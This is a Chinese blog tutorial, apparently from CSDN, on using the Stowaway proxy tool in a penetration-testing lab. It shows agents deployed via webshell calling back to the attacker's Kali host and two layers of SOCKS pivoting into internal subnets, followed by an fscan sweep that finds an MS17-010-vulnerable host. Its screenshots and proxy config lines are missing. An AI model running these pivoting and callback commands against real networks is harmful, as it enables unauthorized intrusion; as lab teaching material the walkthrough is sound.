Stowaway内网代理

Stowaway

       Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具,用户可使用此程序将外部流量通过多个节点代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能。

特性

管理端更加友好的交互,支持命令补全/历史
一目了然的节点树管理
丰富的节点信息展示
节点间正向/反向连接
节点间支持重连
节点间可通过socks5/http代理进行连接
节点间可通过ssh隧道连接
节点间流量可选择TCP/HTTP
多级socks5流量代理转发,支持UDP/TCP,IPV4/IPV6
节点支持ssh访问远程主机
远程shell
上传及下载文件
端口本地/远程映射
节点可端口复用
自由开关各类服务
节点间相互认证
节点间流量以AES-256-GCM进行加密
相较于v1.0,文件体积减小25%
支持各类平台(Linux/Mac/Windows/MIPS/ARM)

名词解释:

节点: 指 admin || agent
主动模式: 指当前操作的节点主动连接另一个节点
被动模式: 指当前操作的节点监听某个端口,等待另一个节点连接
上游: 指当前操作的节点与其父节点之间的流量
下游:指当前操作的节点与其所有子节点之间的流量

Stowaway使用说明

Stowaway分为两个角色,分别是:
admin   渗透测试者使用的主控端
agent    渗透测试者部署的被控端

具体请参考:
https://github.com/ph4ntonn/Stowaway


建立一层Socks代理

获取靶机一的shell请参考:Socks代理_- Time的博客-CSDN博客

获得靶机一的shell

信息收集

Stowaway内网代理_第1张图片

 发现22网段主机,开启代理继续渗透

1. kali 上启动监听

./linux_admin -l 6666 -s qqww

2.靶机一启动agent

蚁剑连接并上传文件

/linux_agent -c 192.168.1.134:6666 -s qqww

kali收到会话

Stowaway内网代理_第2张图片

3.开启socks代理

进入靶机一的node节点,使用socks命令开启socks代理

detali  #查看节点

use 0
socks 1080

shell  #可以进入靶机一的命令行

Stowaway内网代理_第3张图片

4.打开proxychains4.conf文件

修改代理为以下:

 

5.测试代理

6.获取靶机二的shell,请参考:Socks代理_- Time的博客-CSDN博客

建立二层Socks代理

蚁剑连接靶机二的shell

信息收集

Stowaway内网代理_第4张图片

 发现33网段主机,开启二层代理继续渗透

1. 在node中开启监听

listen   #设置监听

1         #选择模式:被动

6000   #输入监听端口

 可以看到靶机一监听了6000端口

 2.靶机二连接监听端口

蚁剑上传agent文件,授予可执行权限:chmod +x linux-agent

./linux-agent -c 192.168.22.150:6000 -s qqww

Kali收到新节点:

 detail  #查看节点

Stowaway内网代理_第5张图片

 use 1 #选择节点1

Stowaway内网代理_第6张图片

 3.node 1 开启socks代理

 socks 1081      #node 1 就是靶机二Stowaway内网代理_第7张图片

4.Kali打开proxychains4.conf文件

修改代理为以下:

5.测试代理

Stowaway内网代理_第8张图片

6.分析利用

 fscan探测存活主机:./fscan -h 192.168.33.0/24 > ping.txt

cat ping.txt

192.168.33.33主机存在ms17-010漏洞

Stowaway内网代理_第9张图片

 发现3389端口,但是拒绝连接

Stowaway内网代理_第10张图片

ms17-010漏洞的具体攻击过程,请参考:Socks代理_- Time的博客-CSDN博客

...

你可能感兴趣的:(代理模式)